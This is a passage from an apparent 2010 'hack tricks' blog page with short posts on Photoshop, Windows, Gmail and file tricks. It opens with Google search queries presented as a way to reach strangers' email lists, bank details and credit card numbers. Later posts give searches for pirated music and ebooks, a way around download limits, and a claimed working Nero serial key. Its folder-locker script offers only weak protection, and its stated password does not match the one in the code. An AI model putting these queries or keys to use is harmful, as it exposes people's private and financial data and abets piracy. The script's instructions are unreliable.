You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls

3. Hacking Google to gain access to Free Stuffs

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.

I hope you enjoy this post. Pass your comments. Cheers!

For More Tricks Visit: TP's Hack World
Read More ->>

10 Valuable Tips For Photoshop

0 comments

When making any Photoshop Design or Signature there are a few things you always wanna keep in mind. Please note that not ALL of these tips apply to every sig but A LOT of them.

1st - Always keep in mind text. Text is one of the hardest things to master. Just remember to keep it simple. Use Visitor -BRK- or Arial or something like that... nothing to extreme. Because text can RUNE a signature.

2nd - Don't let the render be the main focus of a signature. Make it so that what ever you did shows up first. Because a signature is to show off what YOU can do. Not what a photographer can do.

3rd - Have a focial point. When someone first looks at the signature have them have some appealing show up first. That can make a signature alone look A LOT better.

4th - Make sure to keep a signature simple for the most part. Don't over do effects and use a bunch of filters for a signature. It can rune it very fast.

5th - Contrast is a very valuable tool. But DONT OVER USE IT. Having too much contrast in a sig runes it. Keep it pretty low for the most part.

6th - Make sure to properly blend a render. Although some renders dont need to be blended. When you blend an image, make sure that its equally blended in most areas. Don't blend to much in. Don't completely take out a face from a render so only the eyeball is left so your jsut looking at the eyeball with a big blurr... but don't under use it... keep it so that you can still see the render but its nicely fades into the rest of the sig.

7th - Don't leave open gaps. Emtpyness is bad. If you look at a job you did and see a big empty space with nothing to bring it out it will just look bad. And if you do have an empty spot, one good way to fill it in is put text by it.

8th - Size does matter. If you make a sig too big it runes seriousness. If you make it too small then its not very appealing. Keep the sig at a good size. Personally i use 360-120 for the most part. But dont be afriad to make it pretty small... just dont go too much under 350-200.

9th - Borders. Not all sigs need borders but some do. You should always check if your sig needs a border and how to border it. Sometimes it looks good to have a 1 px all around and a thick border on the top and a less thick but still thick border on the bottom... or a random line going down or across the sig to go with the border.

10th - Make your own style. After a while of using Photoshop you'll gain some good quailites and some bad ones. Take the good ones and bring them out. Originality is key!


Read More ->>

Sunday, 3 October 2010

How to Lock Folder Without Any Software?:

1 comments

Sometimes you have been asking for an alternative way to lock folders without the use of any alternative software. It�ll 5 steps ahead only, check now!

� In Notepad copy the code below.

� The default password is �jhankaarbeat�. Change your password in the code, where it shown as jhankaarbeat in yellow background. Password may be any combination of alpha or/and numeric.

� Save this file as �locker.bat�.

� Now double click on locker.bat.

� I t will create a folder named: Locker with automatic lock. After creation of the folder, place the contents (your files & folders) you wants to lock inside the Folder and double click locker.bat again. It will ask to lock the folder Y/N. If you press y then it will lock the folder and your folder will be hide. To unlock run again locker.bat, it will ask to enter password, type in correct password and you can see your folder back.

� Please don�t change anything except password, otherwise this lock may does not work.


����������Code starts line below������������
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDMANNUFORALL
:CONFIRM
echo Are you sure to Lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== tushar goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMANNUFORALL
md Locker
echo Locker created successfully
goto End
:End
�����������Code ends line above������������

For More Tricks Visit: TP's Hack World
Read More ->>

How to Get a New IP Address Even If You Have a Static IP:

0 comments

This trick is very useful for those who have a static IP address.

To start off, you need a direct connection to your modem and computer. If you have a router, disconnect it and directly hook up your modem to your computer.

1. Open up the command prompt by pressing Start->Run and typing in cmd

2. In the command prompt, type “Ipconfig/all”. This will tell you your current IP Address. After, type “ipconfig/release”. Keep the command prompt open for easy access.

3. Go to “Network Connections” (accessible through the control panel). Right click “Local Area Connection” and click “Properties”

4. With “Internet Protocol (TCP/IP) selected, click the “Properties” button.

5. A new window will open. Under the “General” tab, select “Use the Following IP address”. Under “Ip Address”, put “10.0.0.1″. Press the “Tab” key on your keyboard.

6. Press Ok on both open windows.

7. Repeat steps 3-4. Under the “General” tab, press the radio button “Automatically Assign Me an Ip Address”. Press ok on both windows.

8. Go back to the command prompt and type in “Ipconfig/all”. You’ll now notice you have a new IP address.


So, this will be handy if you want to by-pass Rapidshare 1 hour download limit, provided that you have a static IP address.

For More Tricks Visit: TP's Hack World
Read More ->>

Saturday, 2 October 2010

If You forgot your XP Password:

0 comments

Because of the security features built into Windows XP, it is virtually impossible to get back into the system without the password.
You have several options to try and get around this problem.


If you have access to another user account with administrator rights, you can use that account to change the password
of the account that is locked out. You can also use the default Administrator account that is built into Windows XP.


First you need to boot the system into Safe Mode.
1.Restart your system.
2.When you see the blue Dell globe or screen, press the ( F8 ) key about 3 times a second.
3.You should get the Windows startup menu. Use the (Up or Down) arrow keys to highlight (SafeMode)
4.Press (Enter) on (Safe Mode), then press (Enter) on (Windows XP).
5.The system should boot to Safe Mode.

Once you are at the Account Log on Screen, click on the icon
for the user account with administrator rights, or click on the icon
for the administrators account.
Note: For Home the Administrator account isn't normally shown & in Safe Mode you have to press Ctrl+Alt+Delete keys twice to show.
For PRO you can do this in normal mode

When the system has booted to the desktop, use the following steps to change the accounts password.
1.Click Start, Control Panel, Administrative Tools.
2.Click Computer Management.
3.Double click Local Users and Groups, double click the folder Users.
4.Right click on the account name that is locked out, and click on Set Password.
5.You may get a warning message about changing the password, simply click proceed.
6.Leave the New Password box blank, also leave the Confirm Password box blank.
7.Click OK, and OK again.
8.Then close all Windows, reboot the system and try to log in.


There are also applications that can recover the password for you.
The following companies provide these applications at a cost.
iOpus® Password Recovery XP here.
LostPassword.com, here.
Asterisk Password Recovery XP v1.89 here.
Windows XP / 2000 / NT Key here.


If the above information does not help in recovering the password, the only option left is to
format the hard drive then reinstall Windows and the system software.

For More Tricks Visit: TP's Hack World
Read More ->>

Secure Windows Vista PC in 10 Easy Steps:

0 comments

While Windows Vista may be Microsoft's most secure operating system ever, it's far from completely secure. In its fresh-from-the-box configuration, Vista still leaves a chance for your personal data to leak out to the Web through Windows Firewall, or for some nefarious bot to tweak your browser settings  without your knowing. But by making a few judicious changes using the security tools within Windows Vista--and in some cases by adding a few pieces of free software--you can lock down your operating system like a pro.


1. Use Windows Security Center as a Starting Point

For a quick overview of your security settings, the Windows Security Center is where you'll find the status of your system firewall, auto update, malware protection, and other security settings. Click Start, Control Panel, Security Center, or you can simply click the shield icon in the task tray. If you see any red or yellow, you are not fully protected. For example, if you have not yet installed an antivirus product on your machine, or if your current antivirus product is out-of-date, the Malware section of the Security Center should be yellow. Windows does not offer a built-in antivirus utility, so you'll want to install your own. For free antivirus, I recommend AVG Anti-Virus 8.

2. Use Windows Defender as a Diagnostic Tool

The Malware section also covers antispyware protection, and for that Windows Vista includes Windows Defender. The antispyware protection in your antivirus program usually trumps the protection Microsoft provides, but there are several good reasons to keep Windows Defender enabled. One is that every antispyware program uses a different definition of what is and what is not spyware, so redundant protection can actually offer some benefit.

Another reason to keep Windows Defender enabled: diagnostics. Click Tools, and choose Software Explorer from the resulting pane. You can display lists of applications from several categories such as Currently Running Programs, Network Connected Programs, and Winsock Service Providers, but Startup Programs is perhaps the most useful. Click on any name in the left window, and full details will appear in the right pane. By highlighting, you can remove, disable, or enable any of the programs listed.

3. Disable the Start Up menu

Windows Vista keeps track of all the documents and programs you launch in the Start Up menu. This can be convenient for some users, but it can also compromise your privacy if you share a computer within an office or household. Fortunately Windows Vista provides an easy way to tweak this setting. To protect your privacy, follow these steps:

Right click on the taskbar and select Properties.
Click on the Start Menu tab.
Uncheck Store and display a list of recently opened files.
Uncheck Store and display a list of recently opened programs.
Click OK.

4. Get Two-Way Firewall Protection

No desktop should be without a personal firewall, but even if the Security Center says you're protected, you may not be. The Windows Firewall within Vista blocks all incoming traffic that might be malicious or suspicious--and that's good. But outbound protection is not enabled by default. That's a dangerous situation if some new malicious software finds its way onto your PC. Microsoft did include the tools for Windows Vista to have a true two-way firewall, but finding the setting is a little complicated. (Hint: Don't go looking the Windows Firewall settings dialog box.)

To get two-way protection in Windows Vista, click on the Start button; in the search space, type wf.msc and press Enter. Click on the Windows Firewall with Advanced Security icon. This management interface displays the inbound and outbound rules. Click on Windows Firewalls Properties. You should now see a dialog box with several tabs. For each profile--Domain, Private, and Public--change the setting to Block, and then click OK.

Even if you do this tweak, I recommend adding a more robust third-party firewall. I suggest either Comodo Firewall Pro or ZoneAlarm, both of which are free and fare very well in independent firewall testing.

5. Lock Out Unwanted Guests

If you share your computer with others (and even if you don't), Windows Vista includes a neat way to keep unwanted guests from guessing your system administrator password. When you set up users and declare one user as administrator (with full privileges), Windows Vista allows outsiders unlimited guesses at the password you chose. Here's how to limit the guesses.

Click Start, type Local Security Policy.
Click Account Lockout Policy.
Choose Account Lockout Threshold.
At the prompt, enter the number of invalid log-ins you'll accept (say, 3).
Click OK and close.

6. Now Audit Your Attackers

With the Account Lockout policy in place, you can now enable auditing to see any account attacks. To turn on auditing for failed log-on events, do the following:

Click the Start button, type secpol.msc, and click the secpol icon.
Click on Local Policies and then Audit Policy.
Right-click on Audit account logon events policy and select Properties.
Check the Failure box and click OK.
Right-click on Audit logon events policy and select Properties.
Check the Failure box and click OK.
Close the Local Security Policy window.
You can then use the Event Viewer (by running eventvwr.msc) to view the logs under Windows Logs and Security.

7. Secure Your Internet Explorer Settings

The Windows Security Center will also report whether your Internet Explorer 7 (or IE security settings are at their recommended levels. If the screen shows this section as red, you can adjust the settings within the browser itself.

Within Internet Explorer, click Tools in the menu bar.
From the drop-down menu, click Internet Options.
Choose the Security tab.
Within the Security tab, click Custom Level.
Here you'll see a window with all the security options for the browser. If any are below the recommended level (if, say, some kind of malware reconfigured your browser settings), these options will be highlighted in red. To change an individual setting, click the appropriate radio button. To reset them all, use the button near the bottom of the tab. You can also change the overall security setting for Internet Explorer from the default Medium-High setting to the recommended High or Medium, if you wish. Click OK to save and close.


8. Use OpenDNS

Domain Name System (DNS) servers act as a phone book. When you type "pcworld.com" in the address bar, for instance, Internet Explorer sends that common-name request to your Internet service provider's DNS servers to be converted into a series of numbers, or an IP address. Lately, DNS servers have come under attack, with criminals seeking to redirect common DNS preferences to servers that their interests control. One way to stop such abuse is to use OpenDNS.

Go to Start, Control Panel, Network and Internet, and then click Network and Sharing Center. Under the tasks listed on the left, click Manage Network Connections. In the Manage Network Connections window, do the following.

Right-click on the icon representing your network card.
Click Properties.
Click Internet Protocol Version 4.
Click the Properties button.
Select the Use the following DNS server addresses radio button.
Type in a primary address of 208.67.222.222.
Type in a secondary address of 208.67.220.220.
Click OK.

9. Live With User Account Control

One area where some people might want to see the Windows Security Center turn red is User Account Control (UAC), perhaps the most controversial security feature within Windows Vista. Designed to keep rogue remote software from automatically installing (among other things), UAC has a tendency to thwart legitimate software installations by interrupting the process several times with useless messages. In Windows 7 you'll be able to set UAC to the level you want. Until then, you do have some options.

One is to disable UAC. I would caution against that, since UAC is meant to warn you of potential danger. Instead, install TweakUAC, a free utility that offers the ability to turn UAC on or off as well as an intermediate "quiet" mode that keeps UAC on but suppresses administration elevation prompts. With TweakUAC in quiet mode, UAC will appear to be off to those running as administrator accounts, while people with standard user accounts will still be prompted.

10. Check Your Work

Now that you've tweaked Windows Vista, you can keep tabs on your system's security with the System Health Report. This diagnostic tool takes input from the Performance and Reliability Monitor and turns it into an information-packed report that can spotlight potential security problems.

Open Control Panel.
Click System.
In the Tasks list, click Performance (near the bottom).
In the resulting Tasks list, click Advanced tools (near the top).
Click the last item on the resulting list: Generate a system health report.
The report will list any missing drivers that might be causing error codes, tell you whether your antivirus protection is installed, and declare whether UAC is turned on. You may want to run this report once a month just to make sure everything's still good.

For More Tricks Visit: TP's Hack World
Read More ->>

Gmail Drag And Drop Attachments:

0 comments

For Gmail users, are you aware that you can now drag-and-drop attachments to your emails? Last week, Google announced on the official Gmail blog the release of the new drag and drop attachments feature for Gmail. This new feature is automatically added to every Gmail account so users don’t have to install it via Gmail Labs. All you need to do is create a new email (Compose) and select any file you want to attach and drag it anywhere inside the Gmail interface and drop it.

You can add as many attachments as you can as long as you don’t exceed the attachment size limit.

Right now, the Gmail drag and drop attachments feature only work on Google Chrome and Mozilla Firefox 3.6 browsers. This drag-and-drop attachments feature will definitely give users an easier and faster way to add attachments in Gmail. In my case, I won’t be using this feature because I use an email client – Mozilla Thunderbird to manage my Gmail account.

Btw, Google released another new Gmail feature that lets you insert calendar invitations. Pretty useful if you use Gmail alot and want to share your schedules and activities with your co-workers, family and friends.

Anyone tried the drag-and-drop attachments or the insert calendar invitations features on Gmail? What are the things you like or dislike about it? If there are any features or options that you’d like to add to them, what would it be? Please share your thoughts.

For More Tricks Visit: TP's Hack World
Read More ->>

Hide Your Files in jpeg format:

0 comments

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).


2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.
6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .



Read More ->>

100% Working Serial key of Nero 8:

0 comments

Here it is....

1K22-0867-0795-66M4-5538-1736-CE4K                                          


Read More ->>
 

| Computer Hacks and Tricks © 2012. All Rights Reserved | Template Style by TP's Hack World | Design by Tushar Patel | Back To Top |